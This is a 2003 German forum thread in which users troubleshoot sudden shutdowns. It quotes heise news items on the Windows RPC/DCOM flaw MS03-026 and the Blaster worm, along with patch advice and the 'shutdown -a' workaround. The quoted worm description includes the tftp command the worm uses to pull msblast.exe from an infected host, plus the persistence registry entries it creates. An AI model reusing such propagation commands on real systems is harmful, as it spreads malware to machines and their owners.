Wundert mich das bisher hier noch keiner was zu geschrieben hatte, das er ein Problem hat....
Seit den letzten Tagen, vor allem aber gestern wird bei zahlreichen Leuten der PC nach 60 Sec runtergefahren...

In Antwort auf:

---

Fehler in Windows gefährdet Internet-PCs

Das Sicherheitsbulletin MS-03-026 dreht sich um einen Fehler in der RPC-Schnittstelle von Windows NT, 2000, XP und 2003 Server. Es handelt sich dabei um ein Buffer-Overflow-Problem im DCOM-Interface, das auf die Remote Procedure Calls (RPC) aufsetzt. Distributed COM (DCOM) dient zur Kommunikation von Software-Komponenten über das Netzwerk, ähnlich wie COM die Zusammenarbeit von Komponenten auf einem Rechner erlaubt. Ein speziell manipuliertes Paket an den für RPC verwendeten TCP-Port 135 kann Teile des Stacks überschreiben und damit beliebigen Code von außen auf einen Rechner einschleusen und ausführen lassen.

Besonders kritisch ist die Schwachstelle, weil Port 135 standardmäßig immer offen ist und schwer zu schließen ist. Stellt man den RPC-Dienst ab, funktionieren unter Umständen andere wichtige Systemdienste nicht mehr. Besonders bedroht sind Windows-Nutzer, deren PC direkt -- also ohne Router oder Firewall -- mit dem Internet verbunden ist. Denn standardmäßig ist der TCP-Port 135 auch an das DFÜ-Interface gebunden. Wird Zugriff von außen auf diesen Port nicht über die XP-eigene Internet-Verbindungs-Firewall oder eine Personal Firewall abgeblockt, sollte der Patch schnellstens eingespielt werden. Dass Port 135 aus dem Internet erreichbar ist, merkt man im Übrigen oft schon daran, dass sich Pop-Up-Fenster mit dubiosen Inhalten auf dem Desktop öffnen. Im Bulletin weist Microsoft auch auf die Möglichkeit hin, den DCOM-Service abzuschalten, warnt aber davor, dass dies die Kommunikation mit Objekten auf diesem System verhindert. Welche Folgen dies im Einzelfall konkret hat, ist bisher nicht klar. (dab/c't)
vom 17.07.
http://www.heise.de/security/news/meldung/38638

---

Außerdem ist ein Wurm im Umlauf...
Der auch die Lücke nutzt.

In Antwort auf:

---

Alle Schotten dicht -- W32.Blaster greift an

Der seit Tagen erwartete Wurm, der einen Fehler im RPC/DCOM-Dienst unter Windows 2000 und XP ausnutzt, ist im Internet unterwegs. Symantec taufte ihn W32.Blaster, McAfee nennt ihn W32.Lovsan. Das Bundesamt für Sicherheit in der Informationstechnik (BSI) hat ebenfalls bereits eine Warnung herausgegben, siehe dazu das BSI-Advisory auf heise Security.

Auf befallenenen Systemen (A) startet der Wurm einen TFTP-Server und greift weitere Windows-Systeme (B) auf Port 135 an. War ein Angriff erfolgreich, wird der eingeschleuste Code ausgeführt, der auf System B eine Shell auf Port 4444 öffnet. System A veranlasst System B mittels TFTP (tftp <host a> get msblast.exe) die Datei msblast.exe in das Verzeichnis %WinDir%\System32 nachzuladen und zu starten. Anschließend installiert sich der Wurm auf System B, schließt Port 4444, startet einen TFTP-Server und greift weitere Systeme an.

Der Wurm versucht nach Angaben von Symantec eine Denial-of-Service-Attacke gegen windowsupdate.com durchzuführen. Als Zeitraum dafür ist der 15. August bis 31. Dezember definiert. Auf befallenen Systemen werden folgende Registry Einträge erzeugt:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Run "windows auto update" = msblast.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Run "windows auto update" = msblast.exe I just want to say LOVE YOU SAN!! bill

Erkennbar ist ein Befall auch am offenen UDP-Port 69, auf dem der TFTP-Server auf ankommende Verbindungen wartet. Darüberhinaus öffnet ein infiziertes System 20 TCP-Ports im Bereich 2500 bis 2522 und versucht Verbindungen mit weiteren Systemen aufzunehmen. Der genaue Zweck dieser Verbindungen ist noch unklar, Symantec gibt an, dass sie zu Angriffszwecken geöffnet werden. NAI weist hingegen darauf hin, dass die Ports im LISTEN-Mode geöffnet werden, also auf eingehende Verbindungen warten.

Symantec hat bereits ein Removal-Tool bereitgestellt, um den Wurm von befallenen System zu entfernen.

Es wird dringend empfohlen, die Patches zum Beseitigen der Sicherheitslücke einzuspielen. Da der Patch einen weiteren Fehler im RPC-Dienst, der DoS-Attacken ermöglicht, nicht beseitigt, sollten zusätzlich die UDP- und TCP-Ports 135 bis 139, 445 und 593 gefiltert werden. (dab/c't)
http://www.heise.de/newsticker/data/dab-12.08.03-000/

---

ich glaub ich kenn da wen

Atenio

Bapho!

In Antwort auf:

---

vor allem aber gestern wird bei zahlreichen Leuten der PC nach 60 Sec runtergefahren...

---

Kommt mir doch irgendwoher bekannt vor!

Werde mich heute Abend drum kümmern (bzw. kümmern lassen)

Gruß Bine

*löl*

Und ich hab den Patch letzten Freitag druff gepackt

Das freut mich für dich Biggie, es freut mich wirklich

Gruß Bine

scheint ein massives prob zu sein.
war bei mir gestern und heute auch der fall.
bei bekannten ebenfalls.

Centurion

- UF Sektion "Lions-Board" -

Ich habe das Prob gestern abend bemerkt, hab' mir aber erst nichts draus gemacht u. meinen virenscanner drüberlaufen lassen. das prob bestand heute morgen immernoch, habe schön geflucht als ich auf die arbeit bin
beschäftigte mich die ganze zeit, was das wohl wieder ist ...

ist das jetzt die lösung hier? funzt das 100%? diesen patch muss ich innerhalb 60 sec. saugen und installieren
kann das innerhalb dieser zeit überhaupt gemacht werden ???

D03LE
- UF Sektion "Lions-Board" -

@lf

kommt die shutdown warnung direkt nach dem hochfahren ??

bei mir ist es innerhalb 1 stunde 2 mal passiert, mit deutlich luft dazwischen.
zum glück ?!

Centurion

- UF Sektion "Lions-Board" -

@ centurion

gude, wieder im lande? wie war der urlaub?

innerhalb kürzester zeit fährt die kiste runner hast du es mit dem prog i.d. griff bekommen. hats du auch XP?
HELP!

D03LE
- UF Sektion "Lions-Board" -

Du über Start -> Ausführen "shutdown -a" ein, dann schaltet er nicht runter.

Weiteres zu dem Bug http://www.microsoft.com/germany/ms/tech...3-026.htm#Patch
Dort kannst du den auch runterladen, wenns geht also das jetzt von der Firma aus machen...

Und dann ein Virenscannerupdate heute abend durchziehen.

jau wieder schwer am schaffe
außerdem hab ich noch ne mittelohrentzündung mitgebracht.... saustarker schluß des urlaubs !

ja hab auch xp. hab das prob bei mir daheim. werde mich heute nachmittag dann mal darum kümmern.
danach kann ich dir sagen ob es die lösung bringt oder net.

so long

Centurion

- UF Sektion "Lions-Board" -

hab ich das richtig verstanden?
wenn die meldung kommt u. der counter anfängt zu ticken muss ich die START taste drücken, dann AUSFÜHREN und "shutdown -a" eingeben ??? ist das alles, dann hab' ich ruhe für die patches ???

D03LE
- UF Sektion "Lions-Board" -

So wird es in nem anderen Board geschrieben...
Weiß aber auch nicht genau wann überhaupt das Fenster kommt... Hab ja das Prob nicht und so genau hat das keiner geschrieben. Denke wenn du online gehst oder? Sonst saug dir doch wenns geht den Patch jetzt runter und geh nachher erstmal nicht on, installier den Patch...

@ Biggie

Taucht unterschiedlich auf.....bis er gestern das 1. Mal erschien war immerhin schon eine viertel Stunde rum und nachdem ich dann den PC habe runterfahren lassen und wieder on gegangen bin, kam er innerhalb kürzester Zeit. Habs dann noch 2 x versucht, aber auch da erschien es quasi direkt nach dem Online gehen. Heute morgen, als ich das ganze nochmal getestet habe, kam es auch innerhalb kürzester Zeit.

Gruß Bine

Achso! Du brauchst für den Patch

In Antwort auf:

---

Der Windows 2000-Patch kann auf Systemen mit Windows 2000 Service Pack 3 oder Service Pack 4 installiert werden.
Der Patch für Windows XP kann auf Systemen mit Windows XP Gold oder Service Pack 1 installiert werden.

---